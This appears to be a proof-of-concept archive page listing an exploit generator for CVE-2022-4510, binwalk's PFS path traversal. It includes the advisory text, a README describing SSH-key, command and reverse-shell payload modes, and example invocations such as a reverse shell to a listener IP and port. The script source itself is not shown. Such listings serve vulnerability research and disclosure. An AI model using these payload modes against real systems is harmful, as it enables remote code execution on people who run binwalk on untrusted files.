Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-4510 PoC — Path Traversal in binwalk

Source
https://github.com/adhikara13/CVE-2022-4510-WalkingPath
Associated Vulnerability
Title:Path Traversal in binwalk (CVE-2022-4510)
Description:A path traversal vulnerability was identified in ReFirm Labs binwalk from version 2.1.2b through 2.3.3 included. By crafting a malicious PFS filesystem file, an attacker can get binwalk's PFS extractor to extract files at arbitrary locations when binwalk is run in extraction mode (-e option). Remote code execution can be achieved by building a PFS filesystem that, upon extraction, would extract a malicious binwalk module into the folder .config/binwalk/plugins. This vulnerability is associated with program files src/binwalk/plugins/unpfs.py. This issue affects binwalk from 2.1.2b through 2.3.3 included.
Description
A Python script for generating exploits targeting CVE-2022-4510 RCE Binwalk. It supports SSH, command execution, and reverse shell options. Exploits are saved in PNG format. Ideal for testing and demonstrations.
Readme
# CVE-2022-4510-Binwalk

This script allows you to generate exploits for targeting CVE-2022-4510 Binwalk vulnerabilities. The exploits can be used for testing and demonstrations. The supported options include SSH, command execution, and reverse shell.

## Prerequisites
- Python 3.x

## Usage
1. Clone the repository or download the script file.
2. Run the script with the desired options. The available options are:
   - `ssh`: Generate an exploit for SSH.
     - Arguments:
       - `file`: Path to the input .png file.
       - `pub`: Path to the public key file.
   - `command`: Generate an exploit for executing a command.
     - Arguments:
       - `--command`: Command to execute.
       - `file`: Path to the input .png file.
   - `reverse`: Generate an exploit for reverse shell.
     - Arguments:
       - `file`: Path to the input .png file.
       - `ip`: IP address of the listener.
       - `port`: Port number of the listener.

Example usages:
```
python exploit_generator.py ssh input.png public_key.pub
python exploit_generator.py command --command "ls -l" input.png
python exploit_generator.py reverse input.png 192.168.0.100 4444
```

## Output
The generated exploit will be saved as `binwalk_exploit.png` in the current directory.

## Disclaimer
Use this script responsibly and only on systems that you have permission to test or demonstrate vulnerabilities. The author is not responsible for any illegal or unauthorized use of this script.

## References
[https://github.com/electr0sm0g/CVE-2022-4510](https://github.com/electr0sm0g/CVE-2022-4510)
File Snapshot

 [4.0K]  /data/pocs/0ba310c12dd1892412fdfb1505ad73b5700f558f
├── [6.9K]  LICENSE
├── [1.5K]  README.md
└── [3.3K]  walkingpath.py

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →